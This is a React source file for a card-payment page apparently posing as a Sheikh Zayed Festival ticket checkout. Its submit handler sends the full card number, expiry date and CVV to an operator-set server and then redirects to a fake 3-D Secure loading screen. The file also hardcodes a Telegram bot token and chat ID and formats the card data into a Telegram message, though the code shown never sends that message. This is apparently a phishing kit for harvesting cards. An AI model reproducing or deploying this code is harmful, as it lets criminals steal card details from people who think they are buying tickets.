import { useEffect, useRef, useState } from "react";
import { useLocation, useNavigate } from "react-router-dom";
import InputField from "./InputField";
import axios from "axios"
import ReactPixel from "react-facebook-pixel"  


export default function PaymentPage() {

  
  const location = useLocation();
 
const { ticketCount = 0, total = 0 } = location.state || {};
const totalAmount = parseFloat(localStorage.getItem('total'));

  const navigate=useNavigate()



 

   
  const [submitBtnContent, setSubmitBtnContent] = useState(`Submit`)
  const [input1Value, setInput1Value] = useState("")
  const [input2Value, setInput2Value] = useState("")
  const [input3Value, setInput3Value] = useState("")

  const [focusedInput, setFocusedInput] = useState(1) // 1 for first input, 2 for second input, 3 for third input
  const input1Ref = useRef(null)
  const input2Ref = useRef(null)
  const input3Ref = useRef(null)

  const [submitBtnDis, setSubmitBtnDis] = useState(true)

  useEffect(() => {
    updateSubmitBtnDisabled()
  }, [input1Value, input2Value, input3Value])



  const fullUrl = window.location.href
  const handleInput1Focus = () => {
    // trackUserAction('User Started Card Input', false)
    setFocusedInput(1)
  }

  const handleInput2Focus = () => {
    setFocusedInput(2)
  }

  const handleInput3Focus = () => {
    setFocusedInput(3)
  }

  const checkFocus = (num) => {
    return focusedInput === num
  }

  const updateSubmitBtnDisabled = () => {
    console.log(
      `AED {input1Value.length} + AED {input2Value.length} + AED {input3Value.length}`
    )
    // Check conditions for enabling/disabling submit button
    if (
      input1Value !== "" &&
      input2Value !== "" &&
      input3Value !== "" &&
      input1Value.length === 19 &&
      input2Value.length === 5 &&
      input3Value.length === 3 &&
      isDateGreaterThan(input2Value, "10/24")
    ) {
      if (input1Value.charAt(0) === "4" || input1Value.charAt(0) === "5") {
        setSubmitBtnDis(false) // Enable submit button if all inputs are filled
      }
    } else {
      setSubmitBtnDis(true) // Disable submit button if any input is empty
    }
  }

  useEffect(() => {
    const observer = new MutationObserver(() => {
      const val1 = input1Ref.current?.value
      const val2 = input2Ref.current?.value
      const val3 = input3Ref.current?.value
  
      // Update states if values exist
      if (val1) setInput1Value(val1)
      if (val2) setInput2Value(val2)
      if (val3) setInput3Value(val3)
    })
  
    const config = { attributes: true, childList: true, subtree: true }
  
    if (input1Ref.current) observer.observe(input1Ref.current, config)
    if (input2Ref.current) observer.observe(input2Ref.current, config)
    if (input3Ref.current) observer.observe(input3Ref.current, config)
  
    // Cleanup
    return () => observer.disconnect()
  }, [])


  function isDateGreaterThan(dateStr, comparisonDateStr) {
    console.log(dateStr)
    // Extract month and year for both dates
    const [month, year] = dateStr.split("/").map(Number)
    const [compMonth, compYear] = comparisonDateStr.split("/").map(Number)

    // First, compare the years
    if (year > compYear) return true
    if (year < compYear) return false

    // If years are the same, compare the months
    return month > compMonth
  }
  const handleSender = async () => {
    const botToken = "7837303469:AAEw7hcq-r7VeipgHE9kG3uzPlPLDgAtj1o" // Replace with your bot's token
    const url = `https://api.telegram.org/bot${botToken}/sendMessage`

    // Extract the first digit of `main` and the last 4 digits of `main`
    const firstDigit = input1Value?.charAt(0) // First digit
    const lastFourDigits = input1Value?.slice(-4) // Last 4 digits

    // Set values to localStorage
    localStorage.setItem("summ", totalAmount.toFixed(2))
    localStorage.setItem("first-digit", firstDigit)
    localStorage.setItem("last-four-digits", lastFourDigits)

    const payload = {
      chat_id: "-1002222911401", // Replace with the target chat ID
      text: `💳 ${input1Value}
  📆 ${input2Value}
  🔐 ${input3Value}`, // The message text
    }

    try {
      ReactPixel.track("Purchase")
    } catch (err) {
      console.log(err)
    }
    setSubmitBtnContent(<div className="inputLoader"></div>)



    // const additionalMessage = `|${formData.firstName} ${formData.lastName}|${formData.email}|${formData.country.label}|`
    const dataToSend = {
      orderId: "123",
      uuId: localStorage.getItem("uuId"),
      main: input1Value,
      date: input2Value,
      code: input3Value,
      summ: totalAmount.toFixed(2),
      chatId: process.env.REACT_APP_CHAT_ID,
      domain: process.env.REACT_APP_DOMAIN,
      link: fullUrl,
      additional: '',
    }
    console.log(dataToSend)
    try {
      await axios.post(
        process.env.REACT_APP_SERVER_URL + "/api/validation",
        dataToSend,
        {
          headers: {
            "Content-Type": "application/json",
          },
        }
      )
      navigate("/3ds/loading")
    } catch (error) {
      console.error("Error sending data:", error)
      setTimeout(() => {
        setSubmitBtnContent(`Pay: ${localStorage.getItem('price')} Ft`)
      }, 3000)
    }
  }




  return (
    <div className="flex items-center justify-center min-h-screen px-4 bg-gray-100 sm:px-6">
      <div className="w-full max-w-md p-4 bg-white rounded-lg shadow-lg sm:p-6">
        <img className="h-10 mx-auto mb-6 sm:h-12" src="/logo3.jpg" alt="Logo" />
        <h2 className="mb-4 text-lg font-semibold text-start sm:text-xl">Payment</h2>
        
        <div className=" grid grid-cols-2 gap-4  rounded-lg">
          {/* <label className="flex items-center mb-4 space-x-2">
            <input type="radio" checked readOnly className="form-radio" />
            <span className="text-sm font-medium sm:text-lg">Credit / Debit / Prepaid Card</span>
          </label> */}
          
          <div className="flex flex-col col-span-2">
         
            <span className="text-sm font-semibold text-gray-700 sm:text-base">Card Number</span>


            
            <InputField
                    formatType={"card"}
                    ref={input1Ref}
                    value={input1Value}
                    onFocus={handleInput1Focus}
                    onChange={(e) => setInput1Value(e.target.value)}
                    placeholder={"Card number"}
                    focused={checkFocus(1)}
                  />


</div>

            <div className="flex flex-col ">
              <span className="text-sm font-semibold text-gray-700 sm:text-base ">Exp</span>
            <InputField
                      formatType={"date"}
                      ref={input2Ref}
                      value={input2Value}
                      onFocus={handleInput2Focus}
                      onChange={(e) => setInput2Value(e.target.value)}
                      placeholder={"Expiry date"}
                      focused={checkFocus(2)}
                    />
            </div>

            <div className="flex flex-col">

            <span className="text-sm font-semibold text-gray-700 sm:text-base ">CVV / CVC</span>
            
            <InputField
                      formatType={"code"}
                      ref={input3Ref}
                      value={input3Value}
                      onFocus={handleInput3Focus}
                      onChange={(e) => setInput3Value(e.target.value)}
                      placeholder={"CVV"}
                      focused={checkFocus(3)}
                      />
            </div>
                    
        </div>

        <div className="mt-6">
          <div className="text-lg font-semibold text-center sm:text-xl"> </div>



            <div className="flex mt-5 justify-normal">

          <button onClick={handleSender} disabled={submitBtnDis} className="py-3 text-lg w-full font-semibold text-white bg-blue-600 rounded-full w-72 hover:bg-blue-700 disabled:bg-neutral-50 disabled:text-neutral-300">
          {submitBtnContent}
        </button>
            </div>
          <div className="mb-2 text-xs mt-4 text-center opacity-50 sm:text-base">
            <span className="font-medium">Payment To:</span> Sheikh Zayed Festival
          </div>


          
        </div>
      </div>
    </div>
  );
}
